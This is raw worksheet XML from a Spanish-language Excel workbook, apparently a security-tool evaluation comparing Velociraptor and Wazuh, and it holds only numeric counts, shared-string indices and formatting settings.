        <v>3359</v>
      </c>
      <c r="D237" s="43" t="s">
        <v>3360</v>
      </c>
      <c r="E237" s="43" t="s">
        <v>3345</v>
      </c>
      <c r="F237" s="44">
        <v>2775</v>
      </c>
      <c r="G237" s="43" t="s">
        <v>3361</v>
      </c>
      <c r="H237" s="43" t="s">
        <v>3347</v>
      </c>
      <c r="I237" s="43" t="s">
        <v>3348</v>
      </c>
      <c r="J237" s="43" t="s">
        <v>2774</v>
      </c>
    </row>
    <row r="238" spans="1:10" ht="30">
      <c r="A238" s="43" t="s">
        <v>3362</v>
      </c>
      <c r="B238" s="43" t="s">
        <v>1249</v>
      </c>
      <c r="C238" s="43" t="s">
        <v>3363</v>
      </c>
      <c r="D238" s="43" t="s">
        <v>3364</v>
      </c>
      <c r="E238" s="43" t="s">
        <v>3365</v>
      </c>
      <c r="F238" s="44">
        <v>257</v>
      </c>
      <c r="G238" s="43" t="s">
        <v>3366</v>
      </c>
      <c r="H238" s="43" t="s">
        <v>3347</v>
      </c>
      <c r="I238" s="43" t="s">
        <v>3348</v>
      </c>
      <c r="J238" s="43" t="s">
        <v>2774</v>
      </c>
    </row>
    <row r="239" spans="1:10" ht="30">
      <c r="A239" s="43" t="s">
        <v>3367</v>
      </c>
      <c r="B239" s="43" t="s">
        <v>1310</v>
      </c>
      <c r="C239" s="43" t="s">
        <v>2576</v>
      </c>
      <c r="D239" s="43" t="s">
        <v>3368</v>
      </c>
      <c r="E239" s="43" t="s">
        <v>3369</v>
      </c>
      <c r="F239" s="44">
        <v>6743</v>
      </c>
      <c r="G239" s="43" t="s">
        <v>3370</v>
      </c>
      <c r="H239" s="43" t="s">
        <v>3347</v>
      </c>
      <c r="I239" s="43" t="s">
        <v>3348</v>
      </c>
      <c r="J239" s="43" t="s">
        <v>2774</v>
      </c>
    </row>
    <row r="240" spans="1:10" ht="30">
      <c r="A240" s="43" t="s">
        <v>3371</v>
      </c>
      <c r="B240" s="43" t="s">
        <v>1244</v>
      </c>
      <c r="C240" s="43" t="s">
        <v>3372</v>
      </c>
      <c r="D240" s="43" t="s">
        <v>3373</v>
      </c>
      <c r="E240" s="43" t="s">
        <v>3374</v>
      </c>
      <c r="F240" s="44">
        <v>282039</v>
      </c>
      <c r="G240" s="43" t="s">
        <v>3375</v>
      </c>
      <c r="H240" s="43" t="s">
        <v>3376</v>
      </c>
      <c r="I240" s="43" t="s">
        <v>3377</v>
      </c>
      <c r="J240" s="43" t="s">
        <v>3378</v>
      </c>
    </row>
    <row r="241" spans="1:10" ht="30">
      <c r="A241" s="43" t="s">
        <v>3379</v>
      </c>
      <c r="B241" s="43" t="s">
        <v>1244</v>
      </c>
      <c r="C241" s="43" t="s">
        <v>3380</v>
      </c>
      <c r="D241" s="43" t="s">
        <v>3381</v>
      </c>
      <c r="E241" s="43" t="s">
        <v>3374</v>
      </c>
      <c r="F241" s="44">
        <v>282039</v>
      </c>
      <c r="G241" s="43" t="s">
        <v>3375</v>
      </c>
      <c r="H241" s="43" t="s">
        <v>3376</v>
      </c>
      <c r="I241" s="43" t="s">
        <v>3377</v>
      </c>
      <c r="J241" s="43" t="s">
        <v>3378</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A2:J2"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.25" right="0.25" top="0.4" bottom="0.4" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="10" orientation="landscape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sheetPr>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:U76"/>
  <sheetViews>
    <sheetView showGridLines="0" topLeftCell="A30" zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
      <pane ySplit="2" topLeftCell="A32" activePane="bottomLeft" state="frozenSplit"/>
      <selection activeCell="B30" sqref="B30"/>
      <selection pane="bottomLeft" activeCell="J31" sqref="J31"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="25.625" style="42" customWidth="1"/>
    <col min="2" max="16" width="12.625" style="42" customWidth="1"/>
    <col min="17" max="17" width="24.625" style="42" customWidth="1"/>
    <col min="18" max="21" width="12.625" style="42" customWidth="1"/>
    <col min="22" max="16384" width="11" style="42"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:21" ht="24">
      <c r="A1" s="79" t="s">
        <v>2705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114" t="s">
        <v>2706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1" ht="30">
      <c r="A3" s="46" t="s">
        <v>34</v>
      </c>
      <c r="B3" s="46" t="s">
        <v>770</v>
      </c>
      <c r="C3" s="46" t="s">
        <v>753</v>
      </c>
      <c r="D3" s="46" t="s">
        <v>447</v>
      </c>
      <c r="E3" s="46" t="s">
        <v>604</v>
      </c>
      <c r="F3" s="46" t="s">
        <v>2579</v>
      </c>
      <c r="G3" s="46" t="s">
        <v>162</v>
      </c>
      <c r="H3" s="44"/>
      <c r="I3" s="46" t="s">
        <v>150</v>
      </c>
      <c r="J3" s="46" t="s">
        <v>2600</v>
      </c>
      <c r="K3" s="44"/>
      <c r="L3" s="46" t="s">
        <v>162</v>
      </c>
      <c r="M3" s="46" t="s">
        <v>2707</v>
      </c>
      <c r="N3" s="46" t="s">
        <v>2708</v>
      </c>
      <c r="O3" s="44"/>
      <c r="P3" s="46" t="s">
        <v>2136</v>
      </c>
      <c r="Q3" s="46" t="s">
        <v>2216</v>
      </c>
      <c r="R3" s="44"/>
      <c r="S3" s="44"/>
      <c r="T3" s="44"/>
      <c r="U3" s="44"/>
    </row>
    <row r="4" spans="1:21">
      <c r="A4" s="43" t="s">
        <v>44</v>
      </c>
      <c r="B4" s="44">
        <v>0</v>
      </c>
      <c r="C4" s="44">
        <v>2</v>
      </c>
      <c r="D4" s="44">
        <v>2</v>
      </c>
      <c r="E4" s="44">
        <v>38</v>
      </c>
      <c r="F4" s="44">
        <v>42</v>
      </c>
      <c r="G4" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="H4" s="44"/>
      <c r="I4" s="43" t="s">
        <v>770</v>
      </c>
      <c r="J4" s="44">
        <v>19</v>
      </c>
      <c r="K4" s="44"/>
      <c r="L4" s="43" t="s">
        <v>714</v>
      </c>
      <c r="M4" s="44">
        <v>9</v>
      </c>
      <c r="N4" s="44">
        <v>10</v>
      </c>
      <c r="O4" s="44"/>
      <c r="P4" s="43" t="s">
        <v>2145</v>
      </c>
      <c r="Q4" s="44">
        <v>9</v>
      </c>
      <c r="R4" s="44"/>
      <c r="S4" s="44"/>
      <c r="T4" s="44"/>
      <c r="U4" s="44"/>
    </row>
    <row r="5" spans="1:21">
      <c r="A5" s="43" t="s">
        <v>53</v>
      </c>
      <c r="B5" s="44">
        <v>0</v>
      </c>
      <c r="C5" s="44">
        <v>82</v>
      </c>
      <c r="D5" s="44">
        <v>54</v>
      </c>
      <c r="E5" s="44">
        <v>78</v>
      </c>
      <c r="F5" s="44">
        <v>214</v>
      </c>
      <c r="G5" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="H5" s="44"/>
      <c r="I5" s="43" t="s">
        <v>753</v>
      </c>
      <c r="J5" s="44">
        <v>118</v>
      </c>
      <c r="K5" s="44"/>
      <c r="L5" s="43" t="s">
        <v>1235</v>
      </c>
      <c r="M5" s="44">
        <v>0</v>
      </c>
      <c r="N5" s="44">
        <v>0</v>
      </c>
      <c r="O5" s="44"/>
      <c r="P5" s="43" t="s">
        <v>2137</v>
      </c>
      <c r="Q5" s="44">
        <v>3</v>
      </c>
      <c r="R5" s="44"/>
      <c r="S5" s="44"/>
      <c r="T5" s="44"/>
      <c r="U5" s="44"/>
    </row>
    <row r="6" spans="1:21">
      <c r="A6" s="43" t="s">
        <v>60</v>
      </c>
      <c r="B6" s="44">
        <v>0</v>
      </c>
      <c r="C6" s="44">
        <v>6</v>
      </c>
      <c r="D6" s="44">
        <v>16</v>
      </c>
      <c r="E6" s="44">
        <v>8</v>
      </c>
      <c r="F6" s="44">
        <v>30</v>
      </c>
      <c r="G6" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="H6" s="44"/>
      <c r="I6" s="43" t="s">
        <v>447</v>
      </c>
      <c r="J6" s="44">
        <v>109</v>
      </c>
      <c r="K6" s="44"/>
      <c r="L6" s="43" t="s">
        <v>1483</v>
      </c>
      <c r="M6" s="44">
        <v>0</v>
      </c>
      <c r="N6" s="44">
        <v>0</v>
      </c>
      <c r="O6" s="44"/>
      <c r="P6" s="43" t="s">
        <v>1151</v>
      </c>
      <c r="Q6" s="44">
        <v>3</v>
      </c>
      <c r="R6" s="44"/>
      <c r="S6" s="44"/>
      <c r="T6" s="44"/>
      <c r="U6" s="44"/>
    </row>
    <row r="7" spans="1:21" ht="30">
      <c r="A7" s="43" t="s">
        <v>68</v>
      </c>
      <c r="B7" s="44">
        <v>4</v>
      </c>
      <c r="C7" s="44">
        <v>13</v>
      </c>
      <c r="D7" s="44">
        <v>12</v>
      </c>
      <c r="E7" s="44">
        <v>8</v>
      </c>
      <c r="F7" s="44">
        <v>37</v>
      </c>
      <c r="G7" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="H7" s="44"/>
      <c r="I7" s="43" t="s">
        <v>604</v>
      </c>
      <c r="J7" s="44">
        <v>133</v>
      </c>
      <c r="K7" s="44"/>
      <c r="L7" s="43" t="s">
        <v>1484</v>
      </c>
      <c r="M7" s="44"/>
      <c r="N7" s="44">
        <v>0</v>
      </c>
      <c r="O7" s="44"/>
      <c r="P7" s="43" t="s">
        <v>1156</v>
      </c>
      <c r="Q7" s="44">
        <v>4</v>
      </c>
      <c r="R7" s="44"/>
      <c r="S7" s="44"/>
      <c r="T7" s="44"/>
      <c r="U7" s="44"/>
    </row>
    <row r="8" spans="1:21">
      <c r="A8" s="43" t="s">
        <v>77</v>
      </c>
      <c r="B8" s="44">
        <v>5</v>
      </c>
      <c r="C8" s="44">
        <v>7</v>
      </c>
      <c r="D8" s="44">
        <v>1</v>
      </c>
      <c r="E8" s="44">
        <v>1</v>
      </c>
      <c r="F8" s="44">
        <v>14</v>
      </c>
      <c r="G8" s="43" t="s">
        <v>2233</v>
      </c>
      <c r="H8" s="44"/>
      <c r="I8" s="44"/>
      <c r="J8" s="44"/>
      <c r="K8" s="44"/>
      <c r="L8" s="129" t="s">
        <v>2709</v>
      </c>
      <c r="M8" s="129"/>
      <c r="N8" s="129"/>
      <c r="O8" s="44"/>
      <c r="P8" s="44"/>
      <c r="Q8" s="44"/>
      <c r="R8" s="44"/>
      <c r="S8" s="44"/>
      <c r="T8" s="44"/>
      <c r="U8" s="44"/>
    </row>
    <row r="9" spans="1:21">
      <c r="A9" s="43" t="s">
        <v>84</v>
      </c>
      <c r="B9" s="44">
        <v>0</v>
      </c>
      <c r="C9" s="44">
        <v>6</v>
      </c>
      <c r="D9" s="44">
        <v>12</v>
      </c>
      <c r="E9" s="44">
        <v>0</v>
      </c>
      <c r="F9" s="44">
        <v>18</v>
      </c>
      <c r="G9" s="43" t="s">
        <v>2233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43" t="s">
        <v>90</v>
      </c>
      <c r="B10" s="44">
        <v>1</v>
      </c>
      <c r="C10" s="44">
        <v>0</v>
      </c>
      <c r="D10" s="44">
        <v>4</v>
      </c>
      <c r="E10" s="44">
        <v>0</v>
      </c>
      <c r="F10" s="44">
        <v>5</v>
      </c>
      <c r="G10" s="43" t="s">
        <v>2233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43" t="s">
        <v>97</v>
      </c>
      <c r="B11" s="44">
        <v>1</v>
      </c>
      <c r="C11" s="44">
        <v>2</v>
      </c>
      <c r="D11" s="44">
        <v>1</v>
      </c>
      <c r="E11" s="44">
        <v>0</v>
      </c>
      <c r="F11" s="44">
        <v>4</v>
      </c>
      <c r="G11" s="43" t="s">
        <v>2233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43" t="s">
        <v>31</v>
      </c>
      <c r="B12" s="44">
        <v>8</v>
      </c>
      <c r="C12" s="44">
        <v>0</v>
      </c>
      <c r="D12" s="44">
        <v>7</v>
      </c>
      <c r="E12" s="44">
        <v>0</v>
      </c>
      <c r="F12" s="44">
        <v>15</v>
      </c>
      <c r="G12" s="43" t="s">
        <v>2233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t="30">
      <c r="A15" s="46" t="s">
        <v>153</v>
      </c>
      <c r="B15" s="46" t="s">
        <v>44</v>
      </c>
      <c r="C15" s="46" t="s">
        <v>53</v>
      </c>
      <c r="D15" s="46" t="s">
        <v>60</v>
      </c>
      <c r="E15" s="46" t="s">
        <v>68</v>
      </c>
      <c r="F15" s="46" t="s">
        <v>77</v>
      </c>
      <c r="G15" s="46" t="s">
        <v>84</v>
      </c>
      <c r="H15" s="46" t="s">
        <v>90</v>
      </c>
      <c r="I15" s="46" t="s">
        <v>97</v>
      </c>
      <c r="J15" s="46" t="s">
        <v>31</v>
      </c>
      <c r="K15" s="46" t="s">
        <v>2710</v>
      </c>
      <c r="L15" s="44"/>
      <c r="M15" s="46" t="s">
        <v>34</v>
      </c>
      <c r="N15" s="46" t="s">
        <v>1151</v>
      </c>
      <c r="O15" s="46" t="s">
        <v>1156</v>
      </c>
      <c r="P15" s="44"/>
      <c r="Q15" s="46" t="s">
        <v>2711</v>
      </c>
      <c r="R15" s="46" t="s">
        <v>2145</v>
      </c>
      <c r="S15" s="46" t="s">
        <v>2137</v>
      </c>
      <c r="T15" s="46" t="s">
        <v>1151</v>
      </c>
      <c r="U15" s="46" t="s">
        <v>1156</v>
      </c>
    </row>
    <row r="16" spans="1:21">
      <c r="A16" s="43" t="s">
        <v>797</v>
      </c>
      <c r="B16" s="44">
        <v>38</v>
      </c>
      <c r="C16" s="44">
        <v>214</v>
      </c>
      <c r="D16" s="44">
        <v>30</v>
      </c>
      <c r="E16" s="44">
        <v>32</v>
      </c>
      <c r="F16" s="44">
        <v>10</v>
      </c>
      <c r="G16" s="44">
        <v>14</v>
      </c>
      <c r="H16" s="44">
        <v>0</v>
      </c>
      <c r="I16" s="44">
        <v>2</v>
      </c>
      <c r="J16" s="44">
        <v>6</v>
      </c>
      <c r="K16" s="44">
        <v>346</v>
      </c>
      <c r="L16" s="44"/>
      <c r="M16" s="43" t="s">
        <v>44</v>
      </c>
      <c r="N16" s="44">
        <v>0</v>
      </c>
      <c r="O16" s="44">
        <v>1</v>
      </c>
      <c r="P16" s="44"/>
      <c r="Q16" s="43" t="s">
        <v>166</v>
      </c>
      <c r="R16" s="44">
        <v>2</v>
      </c>
      <c r="S16" s="44">
        <v>2</v>
      </c>
      <c r="T16" s="44">
        <v>1</v>
      </c>
      <c r="U16" s="44">
        <v>2</v>
      </c>
    </row>
    <row r="17" spans="1:21">
      <c r="A17" s="43" t="s">
        <v>798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8</v>
      </c>
      <c r="K17" s="44">
        <v>8</v>
      </c>
      <c r="L17" s="44"/>
      <c r="M17" s="43" t="s">
        <v>53</v>
      </c>
      <c r="N17" s="44">
        <v>1</v>
      </c>
      <c r="O17" s="44">
        <v>0</v>
      </c>
      <c r="P17" s="44"/>
      <c r="Q17" s="43" t="s">
        <v>471</v>
      </c>
      <c r="R17" s="44">
        <v>2</v>
      </c>
      <c r="S17" s="44">
        <v>1</v>
      </c>
      <c r="T17" s="44">
        <v>1</v>
      </c>
      <c r="U17" s="44">
        <v>2</v>
      </c>
    </row>
    <row r="18" spans="1:21">
      <c r="A18" s="43" t="s">
        <v>799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/>
      <c r="M18" s="43" t="s">
        <v>60</v>
      </c>
      <c r="N18" s="44">
        <v>0</v>
      </c>
      <c r="O18" s="44">
        <v>0</v>
      </c>
      <c r="P18" s="44"/>
      <c r="Q18" s="43" t="s">
        <v>606</v>
      </c>
      <c r="R18" s="44">
        <v>2</v>
      </c>
      <c r="S18" s="44">
        <v>1</v>
      </c>
      <c r="T18" s="44">
        <v>1</v>
      </c>
      <c r="U18" s="44">
        <v>2</v>
      </c>
    </row>
    <row r="19" spans="1:21">
      <c r="A19" s="43" t="s">
        <v>800</v>
      </c>
      <c r="B19" s="44">
        <v>0</v>
      </c>
      <c r="C19" s="44">
        <v>0</v>
      </c>
      <c r="D19" s="44">
        <v>0</v>
      </c>
      <c r="E19" s="44">
        <v>5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5</v>
      </c>
      <c r="L19" s="44"/>
      <c r="M19" s="43" t="s">
        <v>68</v>
      </c>
      <c r="N19" s="44">
        <v>1</v>
      </c>
      <c r="O19" s="44">
        <v>0</v>
      </c>
      <c r="P19" s="44"/>
      <c r="Q19" s="43" t="s">
        <v>416</v>
      </c>
      <c r="R19" s="44">
        <v>0</v>
      </c>
      <c r="S19" s="44">
        <v>2</v>
      </c>
      <c r="T19" s="44">
        <v>1</v>
      </c>
      <c r="U19" s="44">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:21">
      <c r="A20" s="43" t="s">
        <v>801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/>
      <c r="M20" s="43" t="s">
        <v>77</v>
      </c>
      <c r="N20" s="44">
        <v>0</v>
      </c>
      <c r="O20" s="44">
        <v>1</v>
      </c>
      <c r="P20" s="44"/>
      <c r="Q20" s="43" t="s">
        <v>1485</v>
      </c>
      <c r="R20" s="44">
        <v>2</v>
      </c>
      <c r="S20" s="44">
        <v>1</v>
      </c>
      <c r="T20" s="44">
        <v>1</v>
      </c>
      <c r="U20" s="44">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:21">
      <c r="A21" s="43" t="s">
        <v>803</v>
      </c>
      <c r="B21" s="44">
        <v>4</v>
      </c>
      <c r="C21" s="44">
        <v>0</v>
      </c>
      <c r="D21" s="44">
        <v>0</v>
      </c>
      <c r="E21" s="44">
        <v>0</v>
      </c>
      <c r="F21" s="44">
        <v>0</v>
      </c>
      <c r="G21" s="44">
        <v>4</v>
      </c>
      <c r="H21" s="44">
        <v>5</v>
      </c>
      <c r="I21" s="44">
        <v>2</v>
      </c>
      <c r="J21" s="44">
        <v>1</v>
      </c>
      <c r="K21" s="44">
        <v>16</v>
      </c>
      <c r="L21" s="44"/>
      <c r="M21" s="43" t="s">
        <v>84</v>
      </c>
      <c r="N21" s="44">
        <v>1</v>
      </c>
      <c r="O21" s="44">
        <v>0</v>
      </c>
      <c r="P21" s="44"/>
      <c r="Q21" s="128" t="s">
        <v>2712</v>
      </c>
      <c r="R21" s="128"/>
      <c r="S21" s="128"/>
      <c r="T21" s="128"/>
      <c r="U21" s="128"/>
    </row>
    <row r="22" spans="1:21">
      <c r="A22" s="43" t="s">
        <v>804</v>
      </c>
      <c r="B22" s="44">
        <v>0</v>
      </c>
      <c r="C22" s="44">
        <v>0</v>
      </c>
      <c r="D22" s="44">
        <v>0</v>
      </c>
      <c r="E22" s="44">
        <v>0</v>
      </c>
      <c r="F22" s="44">
        <v>4</v>
      </c>
      <c r="G22" s="44">
        <v>0</v>
      </c>
      <c r="H22" s="44">
        <v>0</v>
      </c>
      <c r="I22" s="44">
        <v>0</v>
      </c>
      <c r="J22" s="44">
        <v>0</v>
      </c>
      <c r="K22" s="44">
        <v>4</v>
      </c>
      <c r="L22" s="44"/>
      <c r="M22" s="43" t="s">
        <v>90</v>
      </c>
      <c r="N22" s="44">
        <v>0</v>
      </c>
      <c r="O22" s="44">
        <v>1</v>
      </c>
      <c r="P22" s="44"/>
      <c r="Q22" s="44"/>
      <c r="R22" s="44"/>
      <c r="S22" s="44"/>
      <c r="T22" s="44"/>
      <c r="U22" s="44"/>
    </row>
    <row r="23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3" t="s">
        <v>97</v>
      </c>
      <c r="N23" s="44">
        <v>0</v>
      </c>
      <c r="O23" s="44">
        <v>1</v>
      </c>
      <c r="P23" s="44"/>
      <c r="Q23" s="44"/>
      <c r="R23" s="44"/>
      <c r="S23" s="44"/>
      <c r="T23" s="44"/>
      <c r="U23" s="44"/>
    </row>
    <row r="2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3" t="s">
        <v>31</v>
      </c>
      <c r="N24" s="44">
        <v>0</v>
      </c>
      <c r="O24" s="44">
        <v>0</v>
      </c>
      <c r="P24" s="44"/>
      <c r="Q24" s="44"/>
      <c r="R24" s="44"/>
      <c r="S24" s="44"/>
      <c r="T24" s="44"/>
      <c r="U24" s="44"/>
    </row>
    <row r="25" spans="1:21" ht="12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1:2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1:2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1:2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28" t="s">
        <v>2713</v>
      </c>
      <c r="M61" s="128"/>
      <c r="N61" s="128"/>
      <c r="O61" s="128"/>
      <c r="P61" s="128"/>
      <c r="Q61" s="128"/>
      <c r="R61" s="128"/>
      <c r="S61" s="128"/>
      <c r="T61" s="128"/>
      <c r="U61" s="128"/>
    </row>
    <row r="62" spans="1:2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28"/>
      <c r="M62" s="128"/>
      <c r="N62" s="128"/>
      <c r="O62" s="128"/>
      <c r="P62" s="128"/>
      <c r="Q62" s="128"/>
      <c r="R62" s="128"/>
      <c r="S62" s="128"/>
      <c r="T62" s="128"/>
      <c r="U62" s="128"/>
    </row>
    <row r="63" spans="1:2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28"/>
      <c r="M63" s="128"/>
      <c r="N63" s="128"/>
      <c r="O63" s="128"/>
      <c r="P63" s="128"/>
      <c r="Q63" s="128"/>
      <c r="R63" s="128"/>
      <c r="S63" s="128"/>
      <c r="T63" s="128"/>
      <c r="U63" s="128"/>
    </row>
    <row r="64" spans="1:2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28"/>
      <c r="M64" s="128"/>
      <c r="N64" s="128"/>
      <c r="O64" s="128"/>
      <c r="P64" s="128"/>
      <c r="Q64" s="128"/>
      <c r="R64" s="128"/>
      <c r="S64" s="128"/>
      <c r="T64" s="128"/>
      <c r="U64" s="128"/>
    </row>
    <row r="65" spans="1:2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</row>
    <row r="72" spans="1:2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</row>
    <row r="73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</row>
    <row r="76" spans="1:2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</sheetData>
  <mergeCells count="5">
    <mergeCell ref="L61:U64"/>
    <mergeCell ref="A1:U1"/>
    <mergeCell ref="A2:U2"/>
    <mergeCell ref="L8:N8"/>
    <mergeCell ref="Q21:U21"/>
  </mergeCells>
  <conditionalFormatting sqref="B4:E12">
    <cfRule type="colorScale" priority="1">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percentile" val="50"/>
        <cfvo type="max"/>
        <color rgb="FFFFFFFF"/>
        <color rgb="FFFFF2CC"/>
        <color rgb="FF4472C4"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="R16:U20">
    <cfRule type="colorScale" priority="2">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percentile" val="50"/>
        <cfvo type="max"/>
        <color rgb="FFF4CCCC"/>
        <color rgb="FFFFF2CC"/>
        <color rgb="FFE2EFDA"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.25" right="0.25" top="0.4" bottom="0.4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25</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="55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09_Resultados_Custom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'00_Guia'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'01_Dashboard'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'03_Evaluacion_VR'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'05_Matriz_Resultados'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'06_Resumen'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'07_Catalogo_Artifacts'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'09_Resultados_Custom'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'14_Arquitectura_Custom'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'15_Publicos_Definitivo'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>COMPARACION_VR_WAZUH!Área_de_impresión</vt:lpstr>
      <vt:lpstr>FUENTES!Área_de_impresión</vt:lpstr>
      <vt:lpstr>GRAFICAS!Área_de_impresión</vt:lpstr>
      <vt:lpstr>VISIBILIDAD_SISTEMA!Área_de_impresión</vt:lpstr>
      <vt:lpstr>WAZUH_DETALLE!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'00_Guia'!Títulos_a_imprimir</vt:lpstr>
      <vt:lpstr>'03_Evaluacion_VR'!Títulos_a_imprimir</vt:lpstr>
      <vt:lpstr>'05_Matriz_Resultados'!Títulos_a_imprimir</vt:lpstr>
      <vt:lpstr>'06_Resumen'!Títulos_a_imprimir</vt:lpstr>
      <vt:lpstr>'07_Catalogo_Artifacts'!Títulos_a_imprimir</vt:lpstr>
      <vt:lpstr>'09_Resultados_Custom'!Títulos_a_imprimir</vt:lpstr>
      <vt:lpstr>'14_Arquitectura_Custom'!Títulos_a_imprimir</vt:lpstr>
      <vt:lpstr>'15_Publicos_Definitivo'!Títulos_a_imprimir</vt:lpstr>
      <vt:lpstr>FUENTES!Títulos_a_imprimir</vt:lpstr>
      <vt:lpstr>VISIBILIDAD_SISTEMA!Títulos_a_imprimir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2026-08-04T10:45:25Z</dcterms:modified>
</cp:coreProperties>
</file>